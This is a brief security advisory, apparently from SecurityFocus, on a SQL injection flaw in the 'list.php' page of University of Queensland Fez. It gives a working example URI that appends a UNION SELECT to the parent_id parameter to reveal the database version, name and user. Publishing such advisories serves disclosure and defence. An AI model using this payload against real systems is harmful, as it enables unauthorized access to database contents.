University of Queensland Fez 'list.php' SQL Injection Vulnerability

Attackers can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*


 

Privacy Statement
Copyright 2010, SecurityFocus